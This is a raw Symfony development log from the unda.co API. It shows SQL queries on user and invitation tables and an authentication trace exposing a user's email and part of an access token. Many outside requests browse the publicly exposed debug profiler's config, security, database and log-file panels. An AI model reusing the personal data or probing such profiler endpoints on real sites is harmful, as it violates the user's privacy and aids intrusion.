[2025-12-21 02:23:33] doctrine.DEBUG: SELECT i0_.id AS id_0, i0_.uuid AS uuid_1, i0_.status AS status_2, i0_.date_created AS date_created_3, i0_.date_modified AS date_modified_4, i0_.name AS name_5, i0_.last_name AS last_name_6, i0_.code AS code_7, i0_.image_code_path AS image_code_path_8, i0_.type AS type_9, i0_.subtype AS subtype_10, i0_.date_invitation AS date_invitation_11, i0_.date_start AS date_start_12, i0_.date_end AS date_end_13, i0_.event_id AS event_id_14, i0_.address_id AS address_id_15, i0_.user_id AS user_id_16 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) ORDER BY i0_.date_invitation DESC LIMIT 10 OFFSET 0 [263,1] []
[2025-12-21 02:23:33] doctrine.DEBUG: SELECT count(i0_.id) AS sclr_0 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) [263,1] []
[2025-12-21 02:23:33] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [485] []
[2025-12-21 02:23:33] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [487] []
[2025-12-21 02:23:33] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [387] []
[2025-12-21 02:23:33] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.monday AS monday_6, t0.tuesday AS tuesday_7, t0.wednesday AS wednesday_8, t0.thursday AS thursday_9, t0.friday AS friday_10, t0.saturday AS saturday_11, t0.sunday AS sunday_12, t0.date_start AS date_start_13, t0.date_end AS date_end_14, t0.invitation_id AS invitation_id_15 FROM `interval` t0 WHERE t0.invitation_id = ? [25549] []
[2025-12-21 02:23:33] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
[2025-12-21 02:23:38] request.INFO: Matched route "residential_get_uuid_providers". {"route":"residential_get_uuid_providers","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\ResidentialController::residentialProvidersGETAction","domain":"api.unda.co","uuid":"ea8ebf85-64c0-4608-897f-51db3c3b7f50","_route":"residential_get_uuid_providers"},"request_uri":"https://api.unda.co/residential/ea8ebf85-64c0-4608-897f-51db3c3b7f50/providers","method":"GET"} []
[2025-12-21 02:23:38] security.DEBUG: Read existing security token from the session. {"key":"_security_bearer_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
[2025-12-21 02:23:38] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["e28f9c3e6ae6f49f4a029e5d65 [...]"] []
[2025-12-21 02:23:38] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [487] []
[2025-12-21 02:23:38] security.DEBUG: Cannot refresh token because user has changed. {"username":"nachoslsu@hotmail.com","provider":"Hona\\ApiBundle\\Security\\ApiUserProvider"} []
[2025-12-21 02:23:38] security.DEBUG: Token was deauthenticated after trying to refresh it. [] []
[2025-12-21 02:23:38] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-21 02:23:38] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 02:23:38] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 02:23:38] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 02:23:38] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["e28f9c3e6ae6f49f4a029e5d65 [...]"] []
[2025-12-21 02:23:38] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [487] []
[2025-12-21 02:23:38] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"nachoslsu@hotmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 02:23:38] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 02:23:38] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-21 02:23:38] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
[2025-12-21 02:30:18] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"00728c","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/00728c","method":"GET"} []
[2025-12-21 02:30:18] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-21 02:31:35] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"f40bbd","_route":"_profiler"},"request_uri":"https://auth.unda.co/_profiler/f40bbd?panel=dump","method":"GET"} []
[2025-12-21 02:31:35] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://auth.unda.co/_profiler/search_bar?panel=dump","method":"GET"} []
[2025-12-21 02:40:23] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-21 02:40:24] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"cc2d11","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/cc2d11?panel=config","method":"GET"} []
[2025-12-21 02:40:24] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-21 02:41:09] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e86139","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/e86139?panel=config","method":"GET"} []
[2025-12-21 02:41:09] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-21 02:42:48] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"4990f9","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/4990f9","method":"GET"} []
[2025-12-21 02:42:48] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-21 02:46:01] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a42aca","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/a42aca?panel=events","method":"GET"} []
[2025-12-21 02:46:01] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=events","method":"GET"} []
[2025-12-21 02:49:13] request.INFO: Matched route "_profiler_open_file". {"route":"_profiler_open_file","route_parameters":{"_controller":"web_profiler.controller.profiler:openAction","_route":"_profiler_open_file"},"request_uri":"https://auth.unda.co/_profiler/open?file=var%2Flogs%2Fdev.log&line=0","method":"GET"} []
[2025-12-21 02:55:18] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7408d6","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/7408d6","method":"GET"} []
[2025-12-21 02:55:18] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-21 02:57:23] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"2d0f32","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/2d0f32","method":"GET"} []
[2025-12-21 02:57:23] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-21 02:57:53] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"bb3b91","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/bb3b91?panel=db","method":"GET"} []
[2025-12-21 02:57:53] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=db","method":"GET"} []
[2025-12-21 02:58:03] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"f40bbd","_route":"_profiler"},"request_uri":"https://auth.unda.co/_profiler/f40bbd?panel=security","method":"GET"} []
[2025-12-21 02:58:03] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://auth.unda.co/_profiler/search_bar?panel=security","method":"GET"} []
[2025-12-21 03:00:10] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e86139","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/e86139?panel=cache","method":"GET"} []
[2025-12-21 03:00:10] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-21 03:03:29] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-21 03:05:05] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"d88c3a","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/d88c3a?panel=twig","method":"GET"} []
[2025-12-21 03:05:05] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-21 03:05:54] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"5ebd67","_route":"_profiler_search_results"},"request_uri":"https://unda.co/_profiler/5ebd67/search/results?ip=66.249.75.1&limit=10&url=https%3A%2F%2Funda.co%2F","method":"GET"} []
[2025-12-21 03:05:54] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?ip=66.249.75.1&limit=10&url=https%3A%2F%2Funda.co%2F","method":"GET"} []
[2025-12-21 03:06:52] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"639e42","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/639e42?panel=twig","method":"GET"} []
[2025-12-21 03:06:52] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-21 03:07:48] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"00728c","_route":"_profiler_search_results"},"request_uri":"https://unda.co/_profiler/00728c/search/results?ip=66.249.75.1&limit=10&url=https%3A%2F%2Funda.co%2Findex.html","method":"GET"} []
[2025-12-21 03:07:48] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?ip=66.249.75.1&limit=10&url=https%3A%2F%2Funda.co%2Findex.html","method":"GET"} []
[2025-12-21 03:09:13] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"a2a520","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/a2a520?group=1&panel=db","method":"GET"} []
[2025-12-21 03:09:13] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?group=1&panel=db","method":"GET"} []
[2025-12-21 03:15:41] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"cc2d11","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/cc2d11?panel=exception","method":"GET"} []
[2025-12-21 03:15:41] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=exception","method":"GET"} []
[2025-12-21 03:20:18] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"5ebd67","_route":"_profiler_search_results"},"request_uri":"https://unda.co/_profiler/5ebd67/search/results?ip=66.249.75.1&limit=10&url=https%3A%2F%2Funda.co%2F","method":"GET"} []
[2025-12-21 03:20:18] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?ip=66.249.75.1&limit=10&url=https%3A%2F%2Funda.co%2F","method":"GET"} []
[2025-12-21 03:22:25] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"e86139","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/e86139","method":"GET"} []
[2025-12-21 03:22:25] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-21 03:24:00] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"f6d265","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/f6d265?panel=config","method":"GET"} []
[2025-12-21 03:24:00] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-21 03:24:01] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"64324b","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/64324b?panel=exception","method":"GET"} []
[2025-12-21 03:24:01] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=exception","method":"GET"} []
[2025-12-21 03:25:04] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"cc2d11","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/cc2d11?panel=validator","method":"GET"} []
[2025-12-21 03:25:04] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=validator","method":"GET"} []
[2025-12-21 03:29:39] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/latest?panel=db","method":"GET"} []
[2025-12-21 03:29:39] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=db","method":"GET"} []
[2025-12-21 03:29:41] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"f40bbd","_route":"_profiler_search_results"},"request_uri":"https://auth.unda.co/_profiler/f40bbd/search/results?ip=180.252.61.142&limit=10","method":"GET"} []
[2025-12-21 03:29:41] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://auth.unda.co/_profiler/search_bar?ip=180.252.61.142&limit=10","method":"GET"} []
[2025-12-21 03:30:14] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-21 03:31:42] request.INFO: Matched route "_profiler_search". {"route":"_profiler_search","route_parameters":{"_controller":"web_profiler.controller.profiler:searchAction","_route":"_profiler_search"},"request_uri":"https://web.unda.co/_profiler/search","method":"GET"} []
[2025-12-21 03:31:42] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"empty","_route":"_profiler_search_results"},"request_uri":"https://web.unda.co/_profiler/empty/search/results","method":"GET"} []
[2025-12-21 03:31:42] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-21 03:34:26] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"cc2d11","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/cc2d11?panel=logger","method":"GET"} []
[2025-12-21 03:34:26] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=logger","method":"GET"} []
[2025-12-21 03:39:03] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"f40bbd","_route":"_profiler"},"request_uri":"https://auth.unda.co/_profiler/f40bbd?panel=config","method":"GET"} []
[2025-12-21 03:39:03] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://auth.unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-21 03:43:49] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"f40bbd","_route":"_profiler"},"request_uri":"https://auth.unda.co/_profiler/f40bbd?panel=request","method":"GET"} []
[2025-12-21 03:43:49] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://auth.unda.co/_profiler/search_bar?panel=request","method":"GET"} []
[2025-12-21 03:47:56] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"d3b11a","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/d3b11a?panel=exception","method":"GET"} []
[2025-12-21 03:47:56] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=exception","method":"GET"} []
[2025-12-21 03:48:26] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"cc2d11","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/cc2d11?panel=events","method":"GET"} []
[2025-12-21 03:48:26] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=events","method":"GET"} []
[2025-12-21 03:49:00] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/latest?panel=time","method":"GET"} []
[2025-12-21 03:49:00] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-21 03:51:24] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"3926d2","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/3926d2?panel=config","method":"GET"} []
[2025-12-21 03:51:24] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-21 03:52:47] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"151d9a","_route":"_profiler_search_results"},"request_uri":"https://www.unda.co/_profiler/151d9a/search/results?limit=10&method=GET","method":"GET"} []
[2025-12-21 03:52:47] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?limit=10&method=GET","method":"GET"} []
[2025-12-21 03:53:11] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"3926d2","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/3926d2?panel=swiftmailer","method":"GET"} []
[2025-12-21 03:53:11] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=swiftmailer","method":"GET"} []
[2025-12-21 03:54:24] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"3926d2","_route":"_profiler_search_results"},"request_uri":"https://web.unda.co/_profiler/3926d2/search/results?ip=85.217.140.1&limit=10","method":"GET"} []
[2025-12-21 03:54:24] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?ip=85.217.140.1&limit=10","method":"GET"} []
[2025-12-21 03:54:38] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"419b71","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/419b71?panel=time","method":"GET"} []
[2025-12-21 03:54:38] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-21 03:57:48] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"3926d2","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/3926d2?panel=dump","method":"GET"} []
[2025-12-21 03:57:48] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=dump","method":"GET"} []
